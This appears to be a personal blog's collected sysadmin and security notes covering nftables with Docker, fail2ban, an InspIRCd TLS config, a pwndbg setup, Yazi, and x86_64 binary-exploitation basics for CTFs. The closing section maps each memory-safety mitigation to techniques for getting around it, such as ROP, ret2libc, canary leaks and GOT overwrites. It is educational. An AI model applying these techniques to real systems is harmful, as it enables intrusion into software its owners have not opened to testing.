Hello Navi

Tech, Security & Personal Notes

VPS nftables Firewall With Docker

This note records a small nftables firewall setup for a VPS that also runs Docker.

The goal is not to write a clever universal ruleset. The goal is simpler: keep the host input path small, expose only the ports that should be public, and avoid fighting Docker's own NAT rules.

The example uses documentation IP addresses:

  • 203.0.113.10 as the admin's trusted IP
  • 198.51.100.20 as the server IP
  • 22222 as the SSH port

Replace them with your own values.

Basic Rules

Use the inet family so the same table can handle IPv4 and IPv6:

#!/usr/sbin/nft -f

flush ruleset

table inet filter {
    set trusted_ipv4 {
        type ipv4_addr
        flags interval
        elements = {
            203.0.113.10,
        }
    }

    chain input {
        type filter hook input priority filter; policy drop;

        iif "lo" accept
        ct state established,related accept
        ct state invalid drop

        ip protocol icmp accept
        # l4proto also matches ICMPv6 behind IPv6 extension headers (e.g. MLD).
        meta l4proto ipv6-icmp accept

        # SSH: only allow the trusted admin IP.
        ip saddr @trusted_ipv4 tcp dport 22222 accept

        # Public web entry.
        tcp dport { 80, 443 } accept
    }

    chain forward {
        type filter hook forward priority filter; policy accept;
    }

    chain output {
        type filter hook output priority filter; policy accept;
    }
}

Docker Notes

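Docker manages its own forwarding and NAT rules. If you blindly flush everything and then set forward to drop, containers may lose network access or published ports may stop working. The example above also starts with flush ruleset, which can remove rules Docker has already created (for example when iptables uses its nftables backend), so you may need to restart Docker after loading it. Traffic to published container ports is DNATed in prerouting and then passes through the forward hook, not input, so the input chain above does not filter it.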

For a small VPS, I usually keep the boundary simple:

  • protect the host through the input chain
  • let Docker manage container NAT
  • expose public services through Caddy on 80/443
  • bind internal app ports to 127.0.0.1 when possible

Example Docker port mapping:

ports:
- "127.0.0.1:8080:8080"

Then let Caddy publish it over HTTPS.
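To reason about rule order in the input chain, here is a toy Python model of it. It is a sketch, not nftables: only the fields the rules match on are modelled, and the addresses and ports are the documentation values used above. One thing it makes visible: the only SSH rule matches ip saddr @trusted_ipv4, so new SSH connections over IPv6 fall through to the drop policy.

```python
from ipaddress import ip_address, ip_network

# Documentation values from the example ruleset; replace them with your own.
TRUSTED_V4 = [ip_network("203.0.113.10/32")]
SSH_PORT = 22222
PUBLIC_TCP = {80, 443}


def input_verdict(iif, ct_state, proto, saddr, dport=None):
    """Walk the example input chain top to bottom; the first matching rule wins."""
    if iif == "lo":
        return "accept"
    if ct_state in ("established", "related"):
        return "accept"
    if ct_state == "invalid":
        return "drop"
    addr = ip_address(saddr)
    if proto == "icmp" and addr.version == 4:
        return "accept"
    if proto == "icmpv6" and addr.version == 6:
        return "accept"
    if proto == "tcp":
        trusted = addr.version == 4 and any(addr in net for net in TRUSTED_V4)
        if dport == SSH_PORT and trusted:
            return "accept"
        if dport in PUBLIC_TCP:
            return "accept"
    return "drop"  # chain policy


print(input_verdict("eth0", "new", "tcp", "2001:db8::5", SSH_PORT))  # drop
```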

Apply Safely

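Validate before loading:

sudo nft -c -f /etc/nftables.conf

Then load it while your current SSH session stays open, and confirm that a new SSH login still works before closing the old session:

sudo nft -f /etc/nftables.conf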

Protect SSH With Fail2ban

Public SSH servers are constantly scanned and brute-forced. Changing the SSH port is not real security by itself, but it reduces background noise. fail2ban adds an actual defensive layer by watching failed login attempts and temporarily banning abusive IP addresses.

This note records a minimal setup for SSH protection with fail2ban and systemd logs.
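The mechanism described above can be pictured as a sliding window per source IP. The sketch below is a toy model, not fail2ban's code: maxretry, findtime, and bantime are real jail options, and the values used here (5 failures, 600 s, 600 s) should match the stock jail.conf defaults, but check your version.

```python
from collections import defaultdict, deque


class JailModel:
    """Toy jail: maxretry failures within findtime seconds ban the IP for bantime seconds."""

    def __init__(self, maxretry: int = 5, findtime: int = 600, bantime: int = 600):
        self.maxretry = maxretry
        self.findtime = findtime
        self.bantime = bantime
        self.failures = defaultdict(deque)  # ip -> timestamps of recent failures
        self.banned_until = {}              # ip -> time when the ban expires

    def is_banned(self, ip: str, now: float) -> bool:
        return self.banned_until.get(ip, 0) > now

    def record_failure(self, ip: str, now: float) -> bool:
        """Record one failed login; return True if this failure triggers a ban."""
        window = self.failures[ip]
        window.append(now)
        # Forget failures that are older than the findtime window.
        while window and window[0] <= now - self.findtime:
            window.popleft()
        if len(window) >= self.maxretry:
            self.banned_until[ip] = now + self.bantime
            window.clear()
            return True
        return False


jail = JailModel()
print([jail.record_failure("192.0.2.50", t) for t in range(5)])
```

Five quick failures trigger a ban on the fifth one, while the same five failures spread 200 seconds apart never fill the window.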

Install Fail2ban

Arch Linux:

sudo pacman -S fail2ban

Debian/Ubuntu:

sudo apt install fail2ban

Enable the service:

sudo systemctl enable --now fail2ban

Optional: Change SSH Port

Edit the SSH daemon config:

sudo vim /etc/ssh/sshd_config

Set a non-default port. This article uses 22222 as an example; replace it with your own value.

Port 22222

Before restarting SSH, keep your current SSH session open. A bad config or firewall mistake can lock you out.

Validate the config:

sudo sshd -t

Restart SSH:

sudo systemctl restart sshd

Some distributions use ssh instead of sshd as the service name:

sudo systemctl restart ssh

Test login from another terminal before closing the old session:

ssh -p 22222 user@example.com

Configure Fail2ban For SSH

Create a local jail config instead of editing the packaged defaults:

sudo vim /etc/fail2ban/jail.d/sshd.local

Minimal config:

[sshd]
enabled = true
port = 22222
backend = systemd

If you keep SSH on the default port, use:

port = ssh

Restart fail2ban:

sudo systemctl restart fail2ban

Check Status

List enabled jails:

sudo fail2ban-client status

Check the SSH jail:

sudo fail2ban-client status sshd

View logs:

sudo journalctl -u fail2ban -e

On systems where fail2ban logs to a file:

sudo less /var/log/fail2ban.log

Unban An IP

If you accidentally ban yourself, unban the IP from another trusted session:

sudo fail2ban-client set sshd unbanip 203.0.113.10

203.0.113.10 is a documentation example address. Replace it with the real IP you need to unban.

Safer SSH Baseline

Fail2ban is only one layer. These SSH settings are usually worth enabling too:

PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes

After changing SSH config, always validate and restart:

sudo sshd -t
sudo systemctl restart sshd

Notes

  • Do not rely on port changes as the only protection.
  • Prefer SSH keys over passwords.
  • Keep an existing SSH session open while changing SSH and firewall settings.
  • If a firewall is enabled, allow the SSH port before restarting SSH.
  • Use /etc/fail2ban/jail.d/*.local files for local overrides so package updates do not overwrite your changes.

InspIRCd IRC Server With TLS

This note records a minimal InspIRCd configuration for running a small IRC server with TLS support. The example exposes a plain client port on 6667 and a TLS client port on 6697.

The TLS setup uses the ssl_gnutls module and certificate files stored under /etc/inspircd/cert/.

Requirements

Install InspIRCd and make sure the GnuTLS SSL module is available:

sudo pacman -S inspircd

On Debian/Ubuntu-style systems, the package name may differ:

sudo apt install inspircd

You also need a certificate and private key. For a public domain, use Let's Encrypt or another ACME client. The config below expects:

/etc/inspircd/cert/fullchain.pem
/etc/inspircd/cert/privkey.pem

TLS Configuration

Add or adapt the following server, module, TLS profile, bind, admin, class, type, and oper blocks in your InspIRCd config.

Do not publish a real oper password. Generate a strong password or use InspIRCd's password hashing support if available in your setup.

<server
    name="irc.example.com"
    description="Example IRC Server"
    network="ExampleNet"
>

<module name="ssl_gnutls">

<sslprofile
    name="DefaultTLS"
    provider="gnutls"
    certfile="/etc/inspircd/cert/fullchain.pem"
    keyfile="/etc/inspircd/cert/privkey.pem"
>

<bind address="" port="6667" type="clients">
<bind address="" port="6697" type="clients" sslprofile="DefaultTLS">

<admin
    name="Example Admin"
    nick="ExampleAdmin"
    email="admin@example.com"
>

<class name="Class" commands="*" privs="*">
<type name="NetAdmin" classes="Class" modes="+s +c">

<oper
    name="admin"
    password="REPLACE_WITH_A_STRONG_PASSWORD_OR_HASH"
    host="*@*"
    type="NetAdmin"
>

Check The Config

Before restarting the service, run InspIRCd's config test if your package provides it:

sudo inspircd --configtest

If your package uses a different wrapper, check the service logs after restart:

sudo systemctl restart inspircd
sudo systemctl status inspircd
sudo journalctl -u inspircd -e
sudo systemctl stop inspircd   # only when you want to take the server down

Connect

Plain IRC:

server: irc.example.com
port: 6667
TLS: off

TLS IRC:

server: irc.example.com
port: 6697
TLS: on

With WeeChat (WeeChat 4.0 and later spell this option -tls instead of -ssl):

/server add examplenet irc.example.com/6697 -ssl
/connect examplenet

With irssi:

/connect -ssl irc.example.com 6697
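To check the TLS listener from a script instead of a client, a minimal sketch with Python's standard ssl module. ssl.create_default_context() verifies the certificate chain and hostname, so a Let's Encrypt certificate for irc.example.com should pass, while a self-signed one raises ssl.SSLCertVerificationError. The nick and realname defaults are placeholders, and the first reply may be a NOTICE or PING rather than the welcome message.

```python
from __future__ import annotations

import socket
import ssl


def registration_lines(nick: str, realname: str) -> list[bytes]:
    """NICK/USER lines a client sends right after connecting (RFC 2812 style)."""
    return [
        f"NICK {nick}\r\n".encode(),
        f"USER {nick} 0 * :{realname}\r\n".encode(),
    ]


def tls_hello(host: str, port: int = 6697, nick: str = "probe",
              realname: str = "TLS probe") -> tuple[str, bytes]:
    """Connect over verified TLS, register, return (negotiated TLS version, first reply)."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            for line in registration_lines(nick, realname):
                tls.sendall(line)
            return tls.version() or "", tls.recv(4096)


# version, reply = tls_hello("irc.example.com")
```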

Oper Login

After connecting as a normal user, authenticate as an IRC operator:

/OPER admin <password>

If login succeeds, the user receives the privileges from the configured NetAdmin type.

Notes

  • Use port 6697 for TLS clients. This is the common IRC-over-TLS port.
  • Keep 6667 only if you intentionally want to allow plaintext clients.
  • Restrict host="*@*" for real deployments. A narrower host mask is safer.
  • Avoid committing real passwords into blog posts, git repositories, or public config examples.
  • Prefer hashed oper passwords if your InspIRCd version and modules support them.

My Pwndbg GDB Init Setup

This is my current .gdbinit setup for binary exploitation and reverse engineering. It loads pwndbg, switches disassembly to Intel syntax, follows child processes after fork, and automatically opens separate tmux panes for disassembly, stack, backtrace, registers, and an IPython scratch pane.

Requirements

Install these first:

  • gdb
  • pwndbg
  • tmux
  • ipython (optional, only used for the scratch pane)

The config assumes pwndbg is installed at:

/usr/share/pwndbg/gdbinit.py

If your pwndbg install path is different, change the first line of the config.

Install

Put the following content in ~/.gdbinit:

source /usr/share/pwndbg/gdbinit.py
set history save on
set follow-fork-mode child
set disassembly-flavor intel

set $mybase1 = 0x0000555555554000
set $mybase = 0x7ffff7ffc000

python
import os
import atexit
import pwndbg
from pwndbg.commands.context import contextoutput

if 'TMUX' in os.environ:
    created_panes = []

    def create_pane(split_cmd):
        output = os.popen(split_cmd).read().strip()
        if not output: return None, None
        pane_id, tty = output.split(":")
        created_panes.append(pane_id)
        return pane_id, tty

    p_disasm_id, p_disasm_tty = create_pane('tmux split-window -vb -P -F "#{pane_id}:#{pane_tty}" -l 75% -d "cat -"')
    p_stack_id, p_stack_tty = create_pane(f'tmux split-window -v -P -F "#{{pane_id}}:#{{pane_tty}}" -l 40% -t {p_disasm_id} -d "cat -"')
    p_bt_id, p_bt_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -t -1 -l 30% -d "cat -"')
    p_regs_id, p_regs_tty = create_pane(f'tmux split-window -h -P -F "#{{pane_id}}:#{{pane_tty}}" -t {p_stack_id} -l 30% -d "cat -"')
    p_ipy_id, p_ipy_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -l 30% -d "ipython"')

    if p_disasm_tty: contextoutput("disasm", p_disasm_tty, True, 'top', False)
    if p_stack_tty: contextoutput("stack", p_stack_tty, True, 'top', False)
    if p_bt_tty: contextoutput("backtrace", p_bt_tty, True, 'top', False)
    if p_regs_tty: contextoutput("regs", p_regs_tty, True, 'top', False)

    if p_stack_tty: contextoutput("legend", p_stack_tty, True)
    if p_regs_tty: contextoutput("expressions", p_regs_tty, True, 'top', False)

    def cleanup_panes():
        for pid in created_panes:
            os.system(f"tmux kill-pane -t {pid} >/dev/null 2>&1")

    atexit.register(cleanup_panes)
else:
    print("\n[\033[33m*\033[0m] Not running inside TMUX. Standard pwndbg output will be used.")

pwndbg.config.context_disasm_lines.value = 25
pwndbg.config.context_stack_lines.value = 18
end

Usage

Start a tmux session first:

tmux

Then run GDB or pwndbg normally:

gdb ./chall

or:

pwndbg ./chall

When GDB starts inside tmux, the config creates panes for:

  • disasm: current instruction context
  • stack: stack view plus pwndbg legend
  • backtrace: call stack
  • regs: registers and expressions
  • ipython: scratch Python shell

When GDB exits, the created tmux panes are killed automatically through the atexit cleanup hook.

If GDB is not running inside tmux, no panes are created and pwndbg falls back to the normal inline context output.

Important Lines

set history save on

Keeps GDB command history across sessions.

set follow-fork-mode child

After fork(), GDB follows the child process. This is useful for fork-based CTF services where the vulnerable logic runs in the child.

set disassembly-flavor intel

Uses Intel syntax instead of AT&T syntax.

pwndbg.config.context_disasm_lines.value = 25
pwndbg.config.context_stack_lines.value = 18

Controls how much disassembly and stack context pwndbg prints.

Base Address Helpers

These two lines are personal scratch variables:

set $mybase1 = 0x0000555555554000
set $mybase = 0x7ffff7ffc000

They are not required. I use them as quick base-address anchors while debugging PIE binaries or shared libraries. You can remove them or replace them with values from piebase, vmmap, or a leak.

Example usage:

x/10i $mybase1 + 0x1234
b *($mybase1 + 0x19e3)

Adjusting The Layout

The pane sizes are controlled by tmux split-window -l:

'tmux split-window -vb ... -l 75% ...'
'tmux split-window -v ... -l 40% ...'
'tmux split-window -h ... -l 30% ...'

Change these percentages if the panes are too large or too small for your monitor.
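The config mixes plain strings and f-strings. Inside an f-string, {{ and }} produce literal braces, which is why the f-string commands spell the tmux format as #{{pane_id}}. If you rework the layout often, a small helper can build the commands and parse tmux's "pane_id:pane_tty" output; split_cmd and parse_pane are hypothetical names, not part of pwndbg.

```python
from __future__ import annotations

# tmux -F format: split-window -P prints e.g. "%5:/dev/pts/7" for the new pane.
FMT = "#{pane_id}:#{pane_tty}"


def split_cmd(flag: str, size: str, target: str | None = None, command: str = "cat -") -> str:
    """Build a tmux split-window command in the same shape as the .gdbinit above."""
    target_opt = f" -t {target}" if target else ""
    # FMT is interpolated as a value, so its braces need no {{ }} escaping here.
    return f'tmux split-window {flag} -P -F "{FMT}"{target_opt} -l {size} -d "{command}"'


def parse_pane(output: str) -> tuple[str | None, str | None]:
    """Split tmux output into (pane_id, tty); (None, None) if tmux printed nothing."""
    output = output.strip()
    if not output:
        return None, None
    pane_id, tty = output.split(":", 1)
    return pane_id, tty


print(split_cmd("-h", "25%", command="ipython"))
```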

If you do not want the IPython pane, remove this line:

p_ipy_id, p_ipy_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -l 30% -d "ipython"')

Troubleshooting

If GDB prints Not running inside TMUX, start tmux first and launch GDB from inside it.

If pwndbg fails to load, verify the path:

ls /usr/share/pwndbg/gdbinit.py

If ipython fails, install it or remove the IPython pane line.

If the panes stay open after a crash, close them manually:

tmux kill-pane -t <pane_id>

Yazi File Manager Setup

Yazi is a terminal file manager written in Rust. It is fast, keyboard-driven, and works well as a lightweight replacement for opening a full GUI file manager when working inside a terminal or SSH session.

This note records a minimal Linux setup: install the standalone binary and add a shell wrapper so that exiting Yazi can change the current shell directory.

Installation

Download the latest musl build from the official release page:

wget https://github.com/sxyazi/yazi/releases/latest/download/yazi-x86_64-unknown-linux-musl.zip

Extract it:

unar yazi-x86_64-unknown-linux-musl.zip
cd yazi-x86_64-unknown-linux-musl

Install both binaries into a directory in $PATH:

sudo mv yazi ya /usr/local/bin/

Check that it works:

yazi --version
ya --version

Shell Wrapper

A terminal file manager runs as a child process of your shell, and a child process cannot change its parent's current directory. Yazi works around this by writing the final directory to a temporary file. A shell function can read that file after Yazi exits and then cd there.

Add this function to .bashrc, .zshrc, or the shell config you use:

function y() {
    local tmp="$(mktemp -t "yazi-cwd.XXXXXX")" cwd
    command yazi "$@" --cwd-file="$tmp"
    IFS= read -r -d '' cwd < "$tmp"
    [ "$cwd" != "$PWD" ] && [ -d "$cwd" ] && builtin cd -- "$cwd"
    rm -f -- "$tmp"
}

Reload the shell configuration:

source ~/.zshrc

For Bash, use:

source ~/.bashrc

Now start Yazi with:

y

When you quit Yazi, the terminal will stay in the directory you were viewing.
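The same --cwd-file handshake can be sketched in Python to show why the wrapper has to be a shell function: this version can only change the working directory of the Python process itself (and anything it starts later), never the shell that launched it. run_and_follow is a hypothetical name; pass ["yazi"] as the command to use it for real.

```python
import os
import subprocess
import tempfile


def run_and_follow(cmd: list) -> None:
    """Run cmd with --cwd-file=<tmp>, then chdir to the directory it wrote there."""
    fd, tmp = tempfile.mkstemp(prefix="yazi-cwd.")
    os.close(fd)
    try:
        # Like the y() wrapper: user arguments first, then the cwd file option.
        subprocess.run([*cmd, f"--cwd-file={tmp}"], check=False)
        with open(tmp, encoding="utf-8") as f:
            cwd = f.read()
        if cwd and cwd != os.getcwd() and os.path.isdir(cwd):
            os.chdir(cwd)  # affects this Python process only
    finally:
        os.remove(tmp)


# run_and_follow(["yazi"])
```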

Notes

  • yazi is the file manager itself.
  • ya is Yazi's helper command, used for package/plugin management and integrations.
  • The musl build is convenient because it is mostly self-contained and works on many Linux distributions.
  • If sudo mv fails, make sure /usr/local/bin exists and is included in $PATH.

Update

To update, download the latest release again in a fresh directory (so an older zip or extracted folder is not picked up by mistake) and replace the old yazi and ya binaries:

cd "$(mktemp -d)"
wget https://github.com/sxyazi/yazi/releases/latest/download/yazi-x86_64-unknown-linux-musl.zip
unar yazi-x86_64-unknown-linux-musl.zip
cd yazi-x86_64-unknown-linux-musl
sudo mv yazi ya /usr/local/bin/

x86_64 Architecture & Stack

Byte Order & Packing

  • Most Linux CTF binaries on x86/x86_64 are little-endian: the least significant byte is stored at the lowest address.
  • 0x40123a packed as 64-bit little-endian becomes 3a 12 40 00 00 00 00 00.
  • This matters for partial overwrites: overflowing byte-by-byte overwrites the low bytes of a saved pointer first.
from pwn import *

p8(0x41) # b'A'
p16(0x1234) # b'4\x12'
p32(0xdeadbeef) # b'\xef\xbe\xad\xde'
p64(0x40123a) # b':\x12@\x00\x00\x00\x00\x00'

u64(leak.ljust(8, b'\x00'))
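When pwntools is not available, the standard struct module gives the same little-endian packing. The helper names below only mirror pwntools; they are plain sketches, not its implementation.

```python
import struct


def p32(x: int) -> bytes:
    return struct.pack("<I", x)  # '<' = little-endian, 'I' = 4-byte unsigned


def p64(x: int) -> bytes:
    return struct.pack("<Q", x)  # 'Q' = 8-byte unsigned


def u64(data: bytes) -> int:
    # Pad short leaks (e.g. a 6-byte user-space pointer) with zero high bytes.
    return struct.unpack("<Q", data.ljust(8, b"\x00"))[0]


print(p64(0x40123a))                         # b':\x12@\x00\x00\x00\x00\x00'
print(hex(u64(b"\x90\xe5\xff\xf7\xff\x7f")))  # 0x7ffff7ffe590
```

For contrast, struct.pack(">Q", 0x40123a) produces the big-endian order, with the 3a byte last.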

Registers

  • word = 2 bytes, dword = 4 bytes, qword = 8 bytes
  • RBP: frame/base pointer, RSP: stack pointer, RIP: instruction pointer.
  • Writing to 32-bit registers (e.g., EAX) automatically clears the upper 32 bits of the corresponding 64-bit register (RAX). xor EAX, EAX is equivalent to xor RAX, RAX but has a shorter encoding.

Memory access sizes:

mov [RAX], bl    ; 1 byte
mov [RAX], bx ; 2 bytes (word)
mov [RAX], ebx ; 4 bytes (dword)
mov [RAX], rbx ; 8 bytes (qword)
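The zero-extension rule for 32-bit writes, compared with 8- and 16-bit writes that leave the other bits alone, fits in a few lines of Python. This is a model of RAX only; the high-byte registers such as AH are left out.

```python
MASK64 = (1 << 64) - 1


def write_rax(rax: int, value: int, width: int) -> int:
    """New RAX after writing `value` to AL (8), AX (16), EAX (32) or RAX (64)."""
    if width == 64:
        return value & MASK64
    if width == 32:
        return value & 0xFFFF_FFFF  # 32-bit writes zero the upper half of RAX
    if width in (8, 16):
        mask = (1 << width) - 1
        return (rax & ~mask & MASK64) | (value & mask)  # the other bits are kept
    raise ValueError("width must be 8, 16, 32 or 64")


rax = 0x1122334455667788
print(hex(write_rax(rax, 0xBEEF, 16)))      # 0x112233445566beef
print(hex(write_rax(rax, 0xDEADBEEF, 32)))  # 0xdeadbeef
```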

Calling Convention (SysV ABI)

  • Arguments: RDI, RSI, RDX, RCX, R8, R9.
  • Return Value: RAX (with RDX potentially holding high bits or extra data).
  • Syscall arguments: RDI, RSI, RDX, R10, R8, R9; syscall number in RAX.
  • RCX and R11 are clobbered by syscall.
  • x86_32: Arguments are passed via the stack in right-to-left order.
man syscall
grep -R "__NR_execve" /usr/include/asm* /usr/include/x86_64-linux-gnu/asm* 2>/dev/null

REX.W Prefix (0x48)

The REX prefix range is 0x40-0x4F (0100 WRXB), used to extend x86 instructions to 64-bit:

  • W: Set to 1 for 64-bit operations.
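  • R, X, B: Extra high bits for the ModRM reg field (R), the SIB index (X), and the ModRM r/m or SIB base field (B); this fourth bit is how R8-R15 are encoded.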

mov RDI, RSP requires a REX prefix with W=1 → 0100 1000 = 0x48.
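The REX byte is just the bit pattern 0100WRXB, so it can be computed directly. The encodings below use MOV r/m64, r64 (opcode 89 /r) and can be cross-checked with rasm2 -a x86 -b 64 "mov rdi, rsp".

```python
def rex(w: int = 0, r: int = 0, x: int = 0, b: int = 0) -> int:
    """Build a REX prefix byte: 0100 W R X B."""
    return 0x40 | (w << 3) | (r << 2) | (x << 1) | b


# mov rdi, rsp: REX.W + 89 /r, ModRM 0xE7 = mod 11, reg 100 (rsp), r/m 111 (rdi)
MOV_RDI_RSP = bytes([rex(w=1), 0x89, 0xE7])
# mov r8, rsp: r8 is r/m 000 plus REX.B, so the prefix becomes 0x49
MOV_R8_RSP = bytes([rex(w=1, b=1), 0x89, 0xE0])

print(MOV_RDI_RSP.hex(), MOV_R8_RSP.hex())  # 4889e7 4989e0
```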

Stack Frame Layout

  • RBP (Register): Points to the base of the current function's stack frame, i.e. the slot holding saved RBP. Local variables sit below it and are accessed relative to it (e.g., [RBP - 0x10]).
  • saved RBP (Stack Data): A backup of the caller's RBP, used to restore the previous frame upon return.

Prologue & Epilogue

; Prologue (Entering Function B)
push RBP ; Save Caller A's RBP -> becomes saved RBP
mov RBP, RSP ; Establish B's stack frame

; Epilogue (Exiting Function B) - Equivalent to 'leave; ret'
mov RSP, RBP ; Clean up local variables
pop RBP ; Restore Caller A's RBP
ret ; Return to Caller A
High Addr  +-------------------------------+
           |     Caller's Stack Frame      |
           +-------------------------------+
           |        return address         | ← pushed by the call instruction
           +-------------------------------+
           |           saved RBP           | ← stores caller's RBP
           +-------------------------------+ ← reg RBP points here
           |        local variables        | ← accessed via [RBP - offset]
           +-------------------------------+ ← reg RSP (stack top)
Low Addr   |           (unused)            |
           +-------------------------------+

Memory Management

Segments

  • .text: Executable code.
  • .data: Initialized global writable data.
  • .rodata: Read-only data (strings, constants).
  • .bss: Uninitialized global writable data.
  • stack: Local variables and function metadata.
  • heap: Dynamically allocated memory via malloc().

Viewing memory maps:

cat /proc/<pid>/maps
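Each line of /proc/<pid>/maps is "start-end perms offset dev inode path", which is what pwndbg's vmmap and piebase summarize. A small parser sketch; the sample addresses in the usage line are made up for illustration.

```python
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class Mapping:
    start: int
    end: int
    perms: str   # e.g. "r-xp": readable, executable, private
    offset: int  # file offset of the first mapped byte
    path: str    # file path, [stack], [heap], or "" for anonymous memory


def parse_maps(text: str) -> list[Mapping]:
    maps = []
    for line in text.splitlines():
        fields = line.rstrip().split(maxsplit=5)  # path may contain spaces
        if len(fields) < 5:
            continue
        start, end = (int(v, 16) for v in fields[0].split("-"))
        path = fields[5] if len(fields) == 6 else ""
        maps.append(Mapping(start, end, fields[1], int(fields[2], 16), path))
    return maps


def module_base(maps: list[Mapping], name: str) -> int:
    """Lowest start address among mappings whose path ends with `name`."""
    return min(m.start for m in maps if m.path.endswith(name))


# with open(f"/proc/{pid}/maps") as f: print(hex(module_base(parse_maps(f.read()), "/chall")))
```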

Von Neumann Architecture

In memory, bytes can represent either code or data; the bytes themselves carry no tag. The CPU distinguishes them by how they are reached: bytes fetched through RIP are executed as opcodes (if the page is executable), while bytes accessed via pointers are treated as data.

Security Mitigations

Name | Description
--- | ---
NX | No-eXecute bit. Hardware-level page attribute marking memory pages as non-executable.
W^X | Write XOR Execute. Memory is either writable or executable, never both simultaneously.
ASLR | Address Space Layout Randomization. Randomizes stack, heap, mmap, and shared-library addresses at runtime.
PIE | Position Independent Executable. Lets ASLR randomize the binary's own base address as well.
canary | Stack protector. Detects stack buffer overflows by checking a secret value before the function returns.

Checksec Reading

Mitigation | Exploitation impact
--- | ---
No Canary | Saved RIP overwrite is usually direct once the offset is known.
Canary | Need leak, byte brute-force, non-return control flow, or write primitive that skips the canary.
NX disabled | Stack/heap shellcode is viable if control can jump to it.
NX enabled | Prefer ROP, ret2libc, mprotect, mmap, JOP/COP, or existing executable regions.
No PIE | Binary code addresses are fixed, e.g. win() / gadgets / PLT have stable absolute addresses.
PIE enabled | Need code pointer leak, PIE base recovery, or partial overwrite/brute force.
No RELRO | GOT is writable and can be overwritten before/after resolution.
Partial RELRO | .got.plt remains writable; lazy binding is still present.
Full RELRO | GOT is read-only after startup; GOT overwrite is blocked.
SHSTK | Intel CET shadow stack verifies returns; classic ret overwrite/ROP may fail.
IBT | Intel CET indirect branch tracking requires indirect-call/jump targets to begin with endbr64.

checksec hints at the easiest path, but it is not a proof. A binary with executable stack may still be protected by SHSTK/IBT, input filters, unstable stack addresses, or non-return exits.

ELF & Dynamic Linking

  • ELF header: architecture, entry point, program headers.
  • Program headers: loader view; maps segments into memory (LOAD, GNU_STACK, GNU_RELRO).
  • Section headers: linker/debugger view; useful for .text, .plt, .got, .bss, symbols.
  • PLT: stubs in the binary used to call imported functions.
  • GOT: table of resolved function/data addresses.
  • Lazy binding: first PLT call jumps into the dynamic resolver, which writes the real libc address into GOT.
  • RELRO: controls whether relocation/GOT pages become read-only after relocation.
file ./chall
readelf -h ./chall
readelf -l ./chall
readelf -S ./chall
readelf -s ./chall
readelf -r ./chall # relocations / GOT targets
objdump -d ./chall | less
objdump -R ./chall # dynamic relocations
strings -a ./chall | less
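The first fields that readelf -h prints come from a fixed 64-byte header, so they are easy to decode by hand. A minimal sketch for 64-bit little-endian ELF only; e_type DYN means a PIE executable or a shared library, EXEC a non-PIE executable.

```python
import struct

ET_NAMES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
EM_X86_64 = 62


def parse_elf64_header(data: bytes) -> dict:
    """Decode the main ELF64 header fields (64-bit little-endian files only)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:  # EI_CLASS = 64-bit, EI_DATA = little-endian
        raise ValueError("sketch only handles 64-bit little-endian ELF")
    (e_type, e_machine, _version, e_entry, e_phoff, _shoff, _flags,
     _ehsize, _phentsize, e_phnum, _shentsize, _shnum, _shstrndx) = struct.unpack_from(
        "<HHIQQQIHHHHHH", data, 16)  # fields right after the 16-byte e_ident
    return {
        "type": ET_NAMES.get(e_type, hex(e_type)),  # EXEC: non-PIE, DYN: PIE or .so
        "machine": e_machine,                       # 62 = x86-64
        "entry": e_entry,                           # entry point (an offset for PIE)
        "phoff": e_phoff,                           # where program headers start
        "phnum": e_phnum,
    }


# with open("./chall", "rb") as f: print(parse_elf64_header(f.read(64)))
```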

Address Translation

  • VA: virtual address used at runtime.
  • RVA / offset inside module: runtime_addr - module_base.
  • File offset: byte offset in the ELF file; not always equal to RVA because segments have mapping alignment.

In a non-PIE ELF, .text often loads near 0x400000. In a PIE ELF, disassemblers may show offsets such as 0x1d08; runtime address is pie_base + 0x1d08.

piebase
breakrva 0x1d08
vmmap
xinfo 0x555555555d08
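The two conversions above as arithmetic: runtime address = base + offset, and file offset = vaddr - p_vaddr + p_offset for the PT_LOAD segment that contains the address. The segment numbers in the usage comment are made up; read real ones from readelf -l.

```python
from __future__ import annotations


def rva_to_runtime(module_base: int, rva: int) -> int:
    """Runtime address = module base (e.g. from piebase or vmmap) + offset in the module."""
    return module_base + rva


def vaddr_to_file_offset(vaddr: int, loads: list[tuple[int, int, int]]) -> int:
    """Map a virtual address to a file offset using PT_LOAD (p_vaddr, p_offset, p_filesz)."""
    for p_vaddr, p_offset, p_filesz in loads:
        if p_vaddr <= vaddr < p_vaddr + p_filesz:
            return vaddr - p_vaddr + p_offset
    raise ValueError(f"{vaddr:#x} is not backed by file bytes (e.g. .bss)")


print(hex(rva_to_runtime(0x555555554000, 0x1d08)))  # 0x555555555d08
# loads = [(0x401000, 0x1000, 0x2c5), ...]; vaddr_to_file_offset(0x40123a, loads) -> 0x123a
```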

Binary Analysis & Tools

CLI Tools

file hello        # Identify arch, linking, stripped status
strip hello # Remove symbols
nm -a hello # Show symbol tables
checksec --file=hello
ltrace ./hello # Trace library calls
strace ./hello # Trace system calls
strings -a hello # Extract printable strings
readelf -a hello # ELF metadata
objdump -d hello # Disassembly

Reverse Engineering Workflow

  1. Identify: file, checksec, readelf -h, rabin2 -I.
  2. Triage strings/imports: strings, rabin2 -zz, rabin2 -i, IDA/Ghidra strings window.
  3. Find control points: main, parser loop, comparison branches, win, system, /bin/sh, open/read/write, strcmp, memcmp, printf.
  4. Recover input format: header magic, version, command/directive fields, length fields, endian, per-record size.
  5. Trace data flow: where user bytes land, how size is computed, where pointers are stored, whether data is copied, validated, freed, or printed.
  6. Convert checks into constraints: compare constants, printable-byte filters, checksums, jump tables, index math, bounds checks.
  7. Exploit mapping: choose leak/write/control-flow primitive that matches mitigations.

Useful questions while reversing:

  • Is the binary stripped? If not, start with symbols. If stripped, start with imports, strings, and cross-references.
  • Does the program return normally, call exit, or loop forever? Return-address hijacking only triggers on a return path.
  • Does a length check use signed or unsigned comparison? Which width: byte, word, dword, or qword?
  • Are there hidden repeat/backdoor paths that re-enter the vulnerable function before canary validation?
  • Does a parser use a switch/jump table? Can an out-of-range or special directive reach extra code?

radare2 Quick Reference

